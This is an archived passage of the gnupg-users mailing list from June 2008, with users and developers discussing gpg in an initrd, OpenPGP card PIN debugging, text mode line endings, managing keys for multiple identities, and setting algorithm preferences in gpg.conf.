at physik.uni-muenchen.de (Christoph Anton Mitterer) Date: Mon, 23 Jun 2008 13:33:09 +0200 Subject: gpg unusable from within an initrd In-Reply-To: <485F7EC7.2030509@pgpru.com> References: <1214077594.3374.4.camel@fermat.scientia.net> <87ej6oa2uj.fsf@wheatstone.g10code.de> <485F7EC7.2030509@pgpru.com> Message-ID: <1214220789.10960.144.camel@etppc19> On Mon, 2008-06-23 at 17:45 +0700, Vlad "SATtva" Miller wrote: > Or, if interactive mode is desired, place this in your initrd script: > > mv /dev/tty /dev/tty.bak > cp -a /dev/console /dev/tty > > # > # do gpg stuff here > # > > rm /dev/tty > mv /dev/tty.bak /dev/tty That's what I do right now (ok I use ln -s instead of cp ;) ) but I considered this only as a workaround... as this could lead to problems (when someone tries to access (the real) /dev/tty in the meantime or so). Thanks, Chris. From wk at gnupg.org Mon Jun 23 16:30:13 2008 From: wk at gnupg.org (Werner Koch) Date: Mon, 23 Jun 2008 16:30:13 +0200 Subject: (possible) feature request ;-) In-Reply-To: <1214220618.10960.138.camel@etppc19> (Christoph Anton Mitterer's message of "Mon, 23 Jun 2008 13:30:18 +0200") References: <1214209865.10960.9.camel@etppc19> <87r6aoa38u.fsf@wheatstone.g10code.de> <1214220618.10960.138.camel@etppc19> Message-ID: <87fxr48bre.fsf@wheatstone.g10code.de> On Mon, 23 Jun 2008 13:30, christoph.anton.mitterer at physik.uni-muenchen.de said: > I set the flag, that nobody writes the key to disk (by accident) if he > uses gpg manually on the encrypted file. You can't avoid that. --for-your-eyes-only is a very weak gadget and only implemented for PGP 2 compatibility. The usual way I invoke gpg is using gpg outfile and that will always work. OpenPGP does not require ant special processing: If the special name "_CONSOLE" is used, the message is considered to be "for your eyes only". This advises that the message data is unusually sensitive, and the receiving program should process it more carefully, perhaps avoiding storing the received data to disk, for example. A data encryption key for the file system is not "for your eyes only" it is for the entire file system. Shalom-Salam, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From christoph.anton.mitterer at physik.uni-muenchen.de Mon Jun 23 16:40:44 2008 From: christoph.anton.mitterer at physik.uni-muenchen.de (Christoph Anton Mitterer) Date: Mon, 23 Jun 2008 16:40:44 +0200 Subject: (possible) feature request ;-) In-Reply-To: <87fxr48bre.fsf@wheatstone.g10code.de> References: <1214209865.10960.9.camel@etppc19> <87r6aoa38u.fsf@wheatstone.g10code.de> <1214220618.10960.138.camel@etppc19> <87fxr48bre.fsf@wheatstone.g10code.de> Message-ID: <1214232044.10960.162.camel@etppc19> On Mon, 2008-06-23 at 16:30 +0200, Werner Koch wrote: > On Mon, 23 Jun 2008 13:30, > christoph.anton.mitterer at physik.uni-muenchen.de said: > > > I set the flag, that nobody writes the key to disk (by accident) if he > > uses gpg manually on the encrypted file. > > You can't avoid that. --for-your-eyes-only is a very weak gadget and > only implemented for PGP 2 compatibility. The usual way I invoke gpg is > using > > gpg outfile > > and that will always work. OpenPGP does not require ant special > processing: > > If the special name "_CONSOLE" is used, the message is considered to > be "for your eyes only". This advises that the message data is > unusually sensitive, and the receiving program should process it more > carefully, perhaps avoiding storing the received data to disk, for > example. Yeah,.. I know all this. > A data encryption key for the file system is not "for your eyes only" it > is for the entire file system. Ok,.. I'll remove it manually.. Chris. From wk at gnupg.org Mon Jun 23 16:56:39 2008 From: wk at gnupg.org (Werner Koch) Date: Mon, 23 Jun 2008 16:56:39 +0200 Subject: Oh Dear, Pin Entry Broken on openPGP card! In-Reply-To: <485F7C9E.7030109@gmail.com> (Edward Robinson's message of "Mon, 23 Jun 2008 11:36:14 +0100") References: <485F6A7C.2010204@gmail.com> <87mylca2xk.fsf@wheatstone.g10code.de> <485F7C9E.7030109@gmail.com> Message-ID: <87bq1s8ajc.fsf@wheatstone.g10code.de> On Mon, 23 Jun 2008 12:36, eddrobinson at gmail.com said: > [When pinentry pops up it says: "Please enter the PIN (`PIN') to > unlock the card". I then enter my pin, the box closes and the > terminal repsonds with:] I was wrong. Your first try with "unblock PIN" was correct. The unblocking requires the Admin-PIN which makes perfect sense because the PIN as already been blocked. There might be a problem in the code. I have no time today to check this, so I need to ask you to help with debugging: - Put "debug 2048" into ~/.gnupg/scdaemon.conf - Put "logfile /foo/bar/scdaemon.log"" into ~/.gnupg/scdaemon.conf - Kill scdaemon ("pkill scdaemon" two time and check that it has gone). - Try again to unblock the PIN - Sanitize the log file: Look for : connection to PIN entry established : send apdu: c=00 i=20 p0=00 p1=82 lc=6 le=-1 : APDU_data: 00 20 00 82 06 31 32 33 34 35 36 ^^^^^^^^^^^^^^^^^ : response: sw=9000 datalen=0 : dump: The marked bytes makes up your passphrase. In this case "123456", the byte just before is the length of the psssphrase. Remove theat from the log file. The example above is for the regualr PIN, you will be asked for the adming pin, which should look more like: : send apdu: c=00 i=20 p0=00 p1=83 lc=8 le=-1 : APDU_data: 00 20 00 83 08 31 32 33 34 35 36 37 38 - Send me the log file (wk at gnupg.org). I need a couple of lines more than shown above. In particular the lines with i=24 and i=2c. Salam-Shalom, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From wk at gnupg.org Mon Jun 23 17:24:05 2008 From: wk at gnupg.org (Werner Koch) Date: Mon, 23 Jun 2008 17:24:05 +0200 Subject: Session Key algorithm In-Reply-To: <8919D897E400EC4A85E30E35FFBF702018A34C@pok1exch002.sfnt.local> (Yasuhiro Funaki's message of "Fri, 20 Jun 2008 19:15:14 +0800") References: <8919D897E400EC4A85E30E35FFBF702018A34C@pok1exch002.sfnt.local> Message-ID: <87od5s6up6.fsf@wheatstone.g10code.de> On Fri, 20 Jun 2008 13:15, Yasuhiro.Funaki at safenet-inc.com said: > I am wondering that which algorithm is used for the session key in GnuPG > 1.4.8? That is all described in RFC4880. > I understand the session key is symmetric key and used for message > encryption, my concern is the compatibility with PGP commercial. Both are OpenPGP compliant. > i.e PGP commercial use IDEA but GnuPG does not have it, then message can No need for this because the preference system of OpenPGP handles the selection of the symmetric encryption algorithm. Shalom-Salam, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From Yasuhiro.Funaki at safenet-inc.com Mon Jun 23 01:57:32 2008 From: Yasuhiro.Funaki at safenet-inc.com (Funaki, Yasuhiro) Date: Mon, 23 Jun 2008 07:57:32 +0800 Subject: Session Key algorithm Message-ID: <8919D897E400EC4A85E30E35FFBF702018A350@pok1exch002.sfnt.local> Dear Expert, I am wondering that which algorithm is used for the session key in GnuPG 1.4.8? I understand the session key is symmetric key and used for message encryption, my concern is the compatibility with PGP commercial. i.e PGP commercial use IDEA but GnuPG does not have it, then message can not be decrypted with Gnupg?? Have a nice day. Yasuhiro The information contained in this electronic mail transmission may be privileged and confidential, and therefore, protected from disclosure. If you have received this communication in error, please notify us immediately by replying to this message and deleting it from your computer without copying or disclosing it. From us3r07 at web.de Sat Jun 21 17:51:35 2008 From: us3r07 at web.de (us3r07 at web.de) Date: Sat, 21 Jun 2008 17:51:35 +0200 Subject: GnuPG package without installer Message-ID: <695021925@web.de> Hello there, it would be nice, if you could also provide an alternative GnuPG binary package for Windows without installer. I would suggest a simple zip file. Thanks! Regards, Kevin _____________________________________________________________________ Der WEB.DE SmartSurfer hilft bis zu 70% Ihrer Onlinekosten zu sparen! http://smartsurfer.web.de/?mc=100071&distributionid=000000000066 From rjh at sixdemonbag.org Mon Jun 23 13:44:50 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Mon, 23 Jun 2008 06:44:50 -0500 Subject: About my prefered settings... In-Reply-To: <485C7636.3040809@gmail.com> References: <485C7636.3040809@gmail.com> Message-ID: <485F8CB2.3020300@sixdemonbag.org> Faramir wrote: > But now, I would like to know what cipher algorithms, hash function and > compression I am using... and of course, I don't know how to know it. Is > there a way to know, by looking at my public key (or sending some > command to gpg), what is my preferred settings? The best way is to take a look at a message you've already sent someone, but this time use the "-v" ("verbose") flag. Using it twice will give more detail. E.g.: gpg --verbose --verbose my_encrypted_file.asc It'll give you more data than you can shake a stick at. From dshaw at jabberwocky.com Mon Jun 23 19:23:46 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Mon, 23 Jun 2008 13:23:46 -0400 Subject: About my prefered settings... In-Reply-To: <485F7410.4040901@gmail.com> References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com> Message-ID: <20080623172346.GA39571@jabberwocky.com> On Mon, Jun 23, 2008 at 05:59:44AM -0400, Faramir wrote: > Now the question is: how do I set a "default prefered ^thing to use^" > without making unavailable the other algorithms? The idea is to use the > custom setting only when the recipient can receive messages using these > settings... I think I'd like to use AES256, SHA256, and ZIP, but only if > that doesn't produce unusable messages... Put this in your gpg.conf: personal-cipher-preferences aes256 personal-digest-preferences sha256 personal-compress-preferences zip GPG will then use those algorithms when possible, but will never use them if it would make the recipient unable to decrypt. David From dshaw at jabberwocky.com Mon Jun 23 20:37:21 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Mon, 23 Jun 2008 14:37:21 -0400 Subject: TEXTMODE Option in Gpg4Win ? In-Reply-To: References: Message-ID: <20080623183721.GB39571@jabberwocky.com> On Wed, Jun 18, 2008 at 09:03:42AM -0700, Larry Seabrook wrote: > Hello, > > We are using the Gpg4Win product for encrypting files. > > The files we are encrypting and sending are text files with carriage-return and linefeed characters at the end of each line (record). > > The receiver of these files needs the CR and LF characters preserved by the encryption-decryption process. The files contain valid text data only. > > When the file is decrypted by the receiver using another PGP-compliant product, the CR and LF characters are lost. > > I BELIEVE we need to use the TEXTMODE=ON option when encrypting the file but the GUI for Gpg4Win does not reference this option, not can I find any reference to a Configuration File in the Gpg4Win GUI or documentation. > > QUESTION: How is TEXTMODE=ON or it's equivalent set when using Gpg4Win? "TEXTMODE=ON" is an old PGP 2.x command. It has nothing to do with GPG. Plus, it's actually the opposite of what you want. In OpenPGP, a text file is canonicalized into a standard format when encrypted, and re-canonicalized to the platform local format when decrypted. Both of these steps can change the CRLF line ending. If you want to guarantee that there are no changes at all, and the decrypted data is a byte for byte copy of the original, then turn off textmode. David From kzembowe at jhuccp.org Mon Jun 23 19:27:52 2008 From: kzembowe at jhuccp.org (Zembower, Kevin) Date: Mon, 23 Jun 2008 13:27:52 -0400 Subject: What regenerates files in ~/.gnupg? Message-ID: What's automatically regenerating the files in my ~/.gnupg/ directory, using the Ubuntu 8.04 system: kevinz at kevinz-laptop:~$ date;rm .gnupg/*;sleep 10; ls -l .gnupg/*;date Mon Jun 23 12:30:38 EDT 2008 -rw------- 1 kevinz kevinz 0 2008-06-23 12:30 .gnupg/pubring.gpg -rw------- 1 kevinz kevinz 0 2008-06-23 12:30 .gnupg/secring.gpg -rw------- 1 kevinz kevinz 40 2008-06-23 12:30 .gnupg/trustdb.gpg Mon Jun 23 12:30:48 EDT 2008 kevinz at kevinz-laptop:~$ This really bit me recently, when, as a newbie to gpg, I copied my keys from another system to a USB memory stick, then copied them to the kevinz-laptop system to learn how to use encryption with Evolution, added a new key for private use, uploaded it to keyservers, then tried to move the files back to my USB stick. When I saw the files regenerated, I thought I had made a mistake with my 'mv' command, so without looking at the timestamps or sizes of the file, just repeated the 'mv' command, with the result of wiping out the new key I generated. Thanks for your help understanding this issue. -Kevin From dshaw at jabberwocky.com Mon Jun 23 20:58:46 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Mon, 23 Jun 2008 14:58:46 -0400 Subject: What regenerates files in ~/.gnupg? In-Reply-To: References: Message-ID: <20080623185845.GD39571@jabberwocky.com> On Mon, Jun 23, 2008 at 01:27:52PM -0400, Zembower, Kevin wrote: > What's automatically regenerating the files in my ~/.gnupg/ directory, > using the Ubuntu 8.04 system: > kevinz at kevinz-laptop:~$ date;rm .gnupg/*;sleep 10; ls -l .gnupg/*;date > Mon Jun 23 12:30:38 EDT 2008 > -rw------- 1 kevinz kevinz 0 2008-06-23 12:30 .gnupg/pubring.gpg > -rw------- 1 kevinz kevinz 0 2008-06-23 12:30 .gnupg/secring.gpg > -rw------- 1 kevinz kevinz 40 2008-06-23 12:30 .gnupg/trustdb.gpg > Mon Jun 23 12:30:48 EDT 2008 > kevinz at kevinz-laptop:~$ > > This really bit me recently, when, as a newbie to gpg, I copied my keys > from another system to a USB memory stick, then copied them to the > kevinz-laptop system to learn how to use encryption with Evolution, > added a new key for private use, uploaded it to keyservers, then tried > to move the files back to my USB stick. When I saw the files > regenerated, I thought I had made a mistake with my 'mv' command, so > without looking at the timestamps or sizes of the file, just repeated > the 'mv' command, with the result of wiping out the new key I generated. If you run gpg, and those files don't exist, gpg will create them. I can't say what is running gpg so oten on your system, but something is doing it - possibly evolution. David From david at coffeefish.org Mon Jun 23 21:28:44 2008 From: david at coffeefish.org (David Koppenhofer) Date: Mon, 23 Jun 2008 15:28:44 -0400 Subject: Multiple uid's vs. multiple primary keys & "master signing keys" Message-ID: Hi everyone, I'm a potential new gpg user, and have been struggling with a few questions about how uid's and keys should be configured. I've poured over the documentation, mailing list, and web pages, and now want to verify what I've come up with so far. I know there are probably no "right" answers, but I would like to know if there is some kind of general consensus about "best practice". At the least, maybe I can find out how people have things set up for real-world usage. 1) Multiple uid's (emails) per primary key versus multiple primary keys I have 3 email addresses I currently use: one personal, one for foss development, and one for work. I could create 3 uid's associated with the same primary key (option A), or 3 separate primary keys with 1 uid each (option B). Here are the trade-offs I've thought of - are they right? Anything else I should consider? * Option A would require 1 passphrase, where B would require 3 passphrases. * Assuming someone wants to certify all 3 uid's: - Option A would require 1 fingerprint to be verified, B would require 3 fingerprints to be verified. - In both cases, 3 signatures would have to be made by the signer, one for each uid. Option A would be more "streamlined" since gnupg prompts the signer whether or not to sign each uid of a key (right?). Option B would require the other party to do "--sign-key" three times. * Option A has 1 encryption key, B has 3. In the 3-key scenario, if I'm forced to reveal encrypted messages to one of the addresses, the others are not automatically compromised. * As far as the web of trust goes: in both options, other people can trust the authenticity of each uid differently. I guess the difference is when I certify others' keys. With option A, I only certify keys with one key, whereas option B would give me a choice of 3 keys to certify with. I suppose that I would have 3 webs of trust in that case. If I include someone in all three webs, then their key will be signed by my name 3 times, albeit with 3 separate key id's. Would that be "weird"? I suppose this is where a "master signing key" comes in... 2) "Master signing key" In the above option B, I could create a fourth (sign-only) key with which I cross-sign my 3 "uid keys" to unify the webs of trust. * Would I certify other people's keys ONLY with this fourth key, and not the other 3? * Wouldn't other people have to then certify at least 2 of my keys: the "master" and as many "uid keys" as they want to? Or would my cross-signing the "master" and the other person's trust in the "master" key cause the "uid keys" to be trusted? * Do people have problems signing a "master signing key" that may not have an email address associated with it? I'm leaning towards Option A (1 primary with 3 uid's), just because it seems simpler. Option B (3 primary, 1 uid each) is still appealing because each uid gets its own encryption key. Is that the only trade-off between those two options? Wow, sorry for the very long-winded message. Thanks in advance for any feedback. Best regards, David From larry_seabrook at yamaha-motor.com Mon Jun 23 21:45:39 2008 From: larry_seabrook at yamaha-motor.com (Larry Seabrook) Date: Mon, 23 Jun 2008 12:45:39 -0700 Subject: TEXTMODE Option in Gpg4Win ? In-Reply-To: <20080623183721.GB39571@jabberwocky.com> Message-ID: David, Do you recommend having a "gpg.conf" file containing "TEXTMODE=OFF" or just omitting that file altogether? Thanks, Larry -----Original Message----- From: gnupg-users-bounces+larry_seabrook=yamaha-motor.com at gnupg.org [mailto:gnupg-users-bounces+larry_seabrook=yamaha-motor.com at gnupg.org] On Behalf Of David Shaw Sent: June 23, 2008 11:37 AM To: gnupg-users at gnupg.org Subject: Re: TEXTMODE Option in Gpg4Win ? On Wed, Jun 18, 2008 at 09:03:42AM -0700, Larry Seabrook wrote: > Hello, > > We are using the Gpg4Win product for encrypting files. > > The files we are encrypting and sending are text files with carriage-return and linefeed characters at the end of each line (record). > > The receiver of these files needs the CR and LF characters preserved by the encryption-decryption process. The files contain valid text data only. > > When the file is decrypted by the receiver using another PGP-compliant product, the CR and LF characters are lost. > > I BELIEVE we need to use the TEXTMODE=ON option when encrypting the file but the GUI for Gpg4Win does not reference this option, not can I find any reference to a Configuration File in the Gpg4Win GUI or documentation. > > QUESTION: How is TEXTMODE=ON or it's equivalent set when using Gpg4Win? "TEXTMODE=ON" is an old PGP 2.x command. It has nothing to do with GPG. Plus, it's actually the opposite of what you want. In OpenPGP, a text file is canonicalized into a standard format when encrypted, and re-canonicalized to the platform local format when decrypted. Both of these steps can change the CRLF line ending. If you want to guarantee that there are no changes at all, and the decrypted data is a byte for byte copy of the original, then turn off textmode. David _______________________________________________ Gnupg-users mailing list Gnupg-users at gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users From dshaw at jabberwocky.com Mon Jun 23 21:53:44 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Mon, 23 Jun 2008 15:53:44 -0400 Subject: TEXTMODE Option in Gpg4Win ? In-Reply-To: References: <20080623183721.GB39571@jabberwocky.com> Message-ID: <20080623195344.GE39571@jabberwocky.com> > On Wed, Jun 18, 2008 at 09:03:42AM -0700, Larry Seabrook wrote: > > Hello, > > > > We are using the Gpg4Win product for encrypting files. > > > > The files we are encrypting and sending are text files with carriage-return and linefeed characters at the end of each line (record). > > > > The receiver of these files needs the CR and LF characters preserved by the encryption-decryption process. The files contain valid text data only. > > > > When the file is decrypted by the receiver using another PGP-compliant product, the CR and LF characters are lost. > > > > I BELIEVE we need to use the TEXTMODE=ON option when encrypting the file but the GUI for Gpg4Win does not reference this option, not can I find any reference to a Configuration File in the Gpg4Win GUI or documentation. > > > > QUESTION: How is TEXTMODE=ON or it's equivalent set when using Gpg4Win? > > "TEXTMODE=ON" is an old PGP 2.x command. It has nothing to do with GPG. Plus, it's actually the opposite of what you want. In OpenPGP, a text file is canonicalized into a standard format when encrypted, and re-canonicalized to the platform local format when decrypted. > Both of these steps can change the CRLF line ending. > > If you want to guarantee that there are no changes at all, and the decrypted data is a byte for byte copy of the original, then turn off textmode. On Mon, Jun 23, 2008 at 12:45:39PM -0700, Larry Seabrook wrote: > David, > > Do you recommend having a "gpg.conf" file containing "TEXTMODE=OFF" or just omitting that file altogether? > > Thanks, > > Larry Please do not top-post. As I said, TEXTMODE=whatever is not a GPG command. It has no functionality in GPG whatsoever. GPG defaults to textmode being disabled. If you are not turning it on, GPG doesn't turn it on for you. David From dshaw at jabberwocky.com Mon Jun 23 22:23:53 2008 From: dshaw at jabberwocky.com (David Shaw) Date: Mon, 23 Jun 2008 16:23:53 -0400 Subject: Multiple uid's vs. multiple primary keys & "master signing keys" In-Reply-To: References: Message-ID: <20080623202353.GF39571@jabberwocky.com> On Mon, Jun 23, 2008 at 03:28:44PM -0400, David Koppenhofer wrote: > Hi everyone, > > I'm a potential new gpg user, and have been struggling with a few > questions about how uid's and keys should be configured. I've poured > over the documentation, mailing list, and web pages, and now want to > verify what I've come up with so far. I know there are probably no > "right" answers, but I would like to know if there is some kind of > general consensus about "best practice". At the least, maybe I can > find out how people have things set up for real-world usage. > > 1) Multiple uid's (emails) per primary key versus multiple primary keys > I have 3 email addresses I currently use: one personal, one for foss > development, and one for work. I could create 3 uid's associated with > the same primary key (option A), or 3 separate primary keys with 1 uid > each (option B). > > Here are the trade-offs I've thought of - are they right? Anything > else I should consider? > * Option A would require 1 passphrase, where B would require 3 passphrases. Not necessarily. You are free to use 1 passphrase for all 3 keys if you like. > * Assuming someone wants to certify all 3 uid's: > - Option A would require 1 fingerprint to be verified, B would > require 3 fingerprints to be verified. Yes. > - In both cases, 3 signatures would have to be made by the signer, > one for each uid. > Option A would be more "streamlined" since gnupg prompts the signer > whether or not to sign each uid of a key (right?). Option B would > require the other party to do "--sign-key" three times. Yes. > * Option A has 1 encryption key, B has 3. In the 3-key scenario, if > I'm forced to reveal encrypted messages to one of the addresses, the > others are not automatically compromised. Yes. > * As far as the web of trust goes: in both options, other people can > trust the authenticity of each uid differently. Yes. > I guess the difference is when I certify others' keys. With option A, > I only certify keys with one key, whereas option B would give me a > choice of 3 keys to certify with. I suppose that I would have 3 webs > of trust in that case. If I include someone in all three webs, then > their key will be signed by my name 3 times, albeit with 3 separate > key id's. Would that be "weird"? I suppose this is where a "master > signing key" comes in... Not weird. Some people do it that way. Some people find it annoying. It's really a matter of taste. > 2) "Master signing key" > In the above option B, I could create a fourth (sign-only) key with > which I cross-sign my 3 "uid keys" to unify the webs of trust. > > * Would I certify other people's keys ONLY with this fourth key, and > not the other 3? Yes. > * Wouldn't other people have to then certify at least 2 of my keys: > the "master" and as many "uid keys" as they want to? Or would my > cross-signing the "master" and the other person's trust in the > "master" key cause the "uid keys" to be trusted? The latter. They would just sign your master key, and you'd sign your own "uid key" with your master. > * Do people have problems signing a "master signing key" that may not > have an email address associated with it? Many do. I personally do have a problem with it, as it makes it very difficult to validate the key unless you know the person personally. > I'm leaning towards Option A (1 primary with 3 uid's), just because it > seems simpler. Option B (3 primary, 1 uid each) is still appealing > because each uid gets its own encryption key. Is that the only > trade-off between those two options? It's handy to make a distinction between your work and personal life, and for many or even most people, their personal "identity" is a lot longer lived than their work "identity". People keep the same personal address for years, but don't as often keep the same job (and thus job address) for that long. Personally, I do this with two keys. One personal, and one work. I don't really get the work one signed, as people who want to reach me generally do so in my personal context (I do FOSS work, but I do it under my personal address as I've found that many people just send mail to personal addresses even there is a special address for FOSS stuff). David From jmoore3rd at bellsouth.net Tue Jun 24 01:25:52 2008 From: jmoore3rd at bellsouth.net (John W. Moore III) Date: Mon, 23 Jun 2008 19:25:52 -0400 Subject: About my prefered settings... In-Reply-To: <485F7410.4040901@gmail.com> References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com> Message-ID: <48603100.7050508@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Faramir wrote: > Cifrado: AES256, AES192, AES, CAST5, 3DES (cipher) > Resumen: SHA1, SHA256, RIPEMD160 (hashing) > Compresi n: ZLIB, BZIP2, ZIP, Sin comprimir [no compression] (compression) > Caracter ?sticas: MDC, Sevidor de claves no-modificar (settings, maybe?) > > Well, it seems I have not messed the config (yet)... > > Now the question is: how do I set a "default prefered ^thing to use^" > without making unavailable the other algorithms? The idea is to use the > custom setting only when the recipient can receive messages using these > settings... I think I'd like to use AES256, SHA256, and ZIP, but only if > that doesn't produce unusable messages... OK, I'm Back and find from parsing My Inbox that I have been "quoted" and 'covered' by others. Sorry I wasn't here all day feeling insecure enough to 'speak' for Myself. Robert J. Hansen & David Shaw have both 'answered' Your Question succinctly; but I personally feel they have missed the essence of Your Question based solely upon Your 'Previous' Post regarding how to see what GPG is "doing." Remember how I told You how to 'showpref'? Well, now You can tell gpg.exe what You'd prefer to be broadcast on Your Public Key by changing 'showpref' to 'setpref' and then using a string like this: setpref S9 S2 S13 S10 S4 S12 S8 S11 S7 S3 S1 H10 H9 H8 H11 H6 H3 H2 Z3 Z2 Z1 Then You'll need to provide Your passphrase and follow the prompts. It should be noted that You will need to then Upload Your Key 'again' to the Keyservers so they will reflect Your changes. You will also need to then require /every/ correspondent to 'refresh' Your Key so the Key they have for You on their Keyring reflects Your 'New' Preferences. Bear in mind also, folks using Ubuntu may not have Z3 available [BZIP2] but that isn't relevant because this is a "Preference" and their installation will compare it with the native ability to Encrypt to what You "prefer" so if it isn't possible it will default to the next 'preference. You wish to 'force' something specific then You enter this line in gpg.conf: digest-algo SHA256 [or whatever] *ALWAYS* Keep In Mind that anytime You _force_ an algorthim, hash or compression You are making the Recipient dependent upon Your choices. If their installation cannot 'handle' it then they will Holler. setpref will broadcast to the Recipient's Keyring what You desire but if You wish to _demand_ Your installation to use Your Preferences then You will need to add the following lines to Your gpg.conf: personal-cipher-preferences S9 S2 S13 S10 S4 S12 S8 S11 S7 S3 S1 personal-digest-preferences H10 H9 H8 H11 H6 H3 H2 personal-compress-preferences Z3 Z2 Z1 Now, PAY ATTENTION: These are the lines from MY gpg.conf and unless You have built Your version of GnuPG to Support TIGER192 [H6] or Camellia [S10, S11, S12] then those designations will _break_ You being able to use Your installation. There are Members of this List who understand I 'break rules' and some call Me an I-D-I-O-T', I prefer the term /Bleeding Edge/ but this in NO way makes Me correct. DO NOT think Me anything other than a 'breadbox' builder rather than an 'Off The Shelf' Amateur. Robert, John Clizbe, Werner, David & Marcus are very correct, accurate and honest when they strongly suggest that the Defaults be honored/accepted. JOHN ;) Timestamp: Monday 23 Jun 2008, 19:25 --400 (Eastern Daylight Time) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.5.0-svn4754: (MingW32) Comment: Public Key at: http://tinyurl.com/8cpho Comment: Gossamer Spider Web of Trust: https://www.gswot.org Comment: Homepage: http://tinyurl.com/yzhbhx iQEcBAEBCgAGBQJIYDD8AAoJEBCGy9eAtCsPvOoH/RoK1Ijy3ETSdQnDo/L5tcmz of5DjGR/Qv05cd/e06bGZhn1ZsKgupc+fPF1Q0gN2Waq0TL2KBxSs4JNoWL1y/HR xPw9SsIN8lqcxUn/k9enrX5zAHBRaRlFoK8JkggVACEUxLBbIrA0qZ3YXYu3u3BR QDbdICwto3CGD4L/zlOSav72rIXsSH3eBhb4bPAdFpPDYIV/CbMiude2dyv7dsHY SXaoRPE/JOq5x15SzVuQDAkm0ArwhChc+0Z2aYVgok0eQXrxL+Ax59Iuvux3tUte 60RQfJOBcfs4CWNRCIOo+iZtuatUVVx/8v6P2u7AdZZrYi2SofoexBRZhxYctd8= =CSOv -----END PGP SIGNATURE----- From rjh at sixdemonbag.org Tue Jun 24 03:43:38 2008 From: rjh at sixdemonbag.org (Robert J. Hansen) Date: Mon, 23 Jun 2008 20:43:38 -0500 Subject: About my prefered settings... In-Reply-To: <48603100.7050508@bellsouth.net> References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com> <48603100.7050508@bellsouth.net> Message-ID: <4860514A.7060903@sixdemonbag.org> > There are Members of this List who understand I 'break rules' and some > call Me an I-D-I-O-T', I prefer the term /Bleeding Edge/ but this in NO > way makes Me correct. I'd characterize it this way, actually: The source is free. You're free to do with it as you like, and most people here will steadfastly defend your right to do these sorts of things so long as you uphold the license agreement for GnuPG. That said, please, please, please, don't send exotic traffic to people who aren't expecting it. It annoys them, it increases their frustration with the entire system, and the more frustrated people get the less likely they are to use GnuPG. And finally, if it breaks you get to keep both pieces. :) From faramir.cl at gmail.com Tue Jun 24 05:30:28 2008 From: faramir.cl at gmail.com (Faramir) Date: Mon, 23 Jun 2008 23:30:28 -0400 Subject: Multiple uid's vs. multiple primary keys & "master signing keys" In-Reply-To: References: Message-ID: <48606A54.1020104@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 David Koppenhofer escribi?: .... > 1) Multiple uid's (emails) per primary key versus multiple primary keys > I have 3 email addresses I currently use: one personal, one for foss > development, and one for work. I could create 3 uid's associated with > the same primary key (option A), or 3 separate primary keys with 1 uid > each (option B). *I* would use option B, one key for each uid. The reason is because if somebody takes a look at a public key with several uid's, that somebody would know all these uid's are closely related, and also would know the email address for each uid. I heard, a couple of weeks ago, about somebody who lost all her email accounts because her primary email address was hacked. The hacker knew the other email addresses, used the option "I forgot my password, send it to my secondary email", and all the other email accounts sent their passwords to the email that was compromised... allowing the hacker to take control of all these accounts, changing the security questions and secondary emails, so the true owner can't recover the accounts. Since then, I'd like to keep my email accounts isolated from each other... I still have to figure out a way to set the secondary addresses to still be able to ask my password in case I forget it, but without risking all my accounts if somebody takes control over one of them. But all this is just my opinion about the subject, your opinion doesn't need to be the same... Best Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEbBAEBAgAGBQJIYGpUAAoJEMV4f6PvczxATnoH90+7TmQRk5xy1N77JmK6Hop0 DUUFK+YV2YWf9J6hVbA/6JxAKANIYcM3pKlXMremTO7RiMP/EaB7/8WPK9yi//OF Yi3Av8VzaWvG+xmd+Zueq+EzOxHh5piQUCZZkgRJz+89VPGSFoWzQyXl88jXoV+k sknQFB7SrsDm8WtdqLVrGp2YGSHpt+umcWD0QtdaUYY/nb/Zqo8mnmn83OUFRoZ3 jntoFuP/vjiTjaIx4lbhzkCNT6i30l5BpF8/MTHmvYliT0mHU0OP3y6iC1olykE/ bv/xUtb0UjYemS4zp5HlHPzuBvBvzreGuyQ2ESZ9sHxShR/sRLyY6WY7pQp0HA== =7mwS -----END PGP SIGNATURE----- From faramir.cl at gmail.com Tue Jun 24 06:27:56 2008 From: faramir.cl at gmail.com (Faramir) Date: Tue, 24 Jun 2008 00:27:56 -0400 Subject: About my prefered settings... In-Reply-To: <20080623172346.GA39571@jabberwocky.com> References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net> <485F7410.4040901@gmail.com> <20080623172346.GA39571@jabberwocky.com> Message-ID: <486077CC.6070004@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 David Shaw escribi?: ... > Put this in your gpg.conf: > > personal-cipher-preferences aes256 > personal-digest-preferences sha256 > personal-compress-preferences zip > > GPG will then use those algorithms when possible, but will never use > them if it would make the recipient unable to decrypt. John W. Moore III escribi?: ... > setpref will broadcast to the Recipient's Keyring what You desire but if > You wish to _demand_ Your installation to use Your Preferences then You > will need to add the following lines to Your gpg.conf: > > personal-cipher-preferences S9 S2 S13 S10 S4 S12 S8 S11 S7 S3 S1 > personal-digest-preferences H10 H9 H8 H11 H6 H3 H2 > personal-compress-preferences Z3 Z2 Z1 > > Now, PAY ATTENTION: These are the lines from MY gpg.conf and unless You > have built Your version of GnuPG to Support TIGER192 [H6] or Camellia > [S10, S11, S12] then those designations will _break_ You being able to > use Your installation. Thanks for the answers. I am a bit confused about if I should use names like aes256 or codes like S9. Also, do I have to include all the cipher/digest/compress algorithms available to my installed gpg, or just one or two? The idea would be "if you can, use this one, if not, do as you 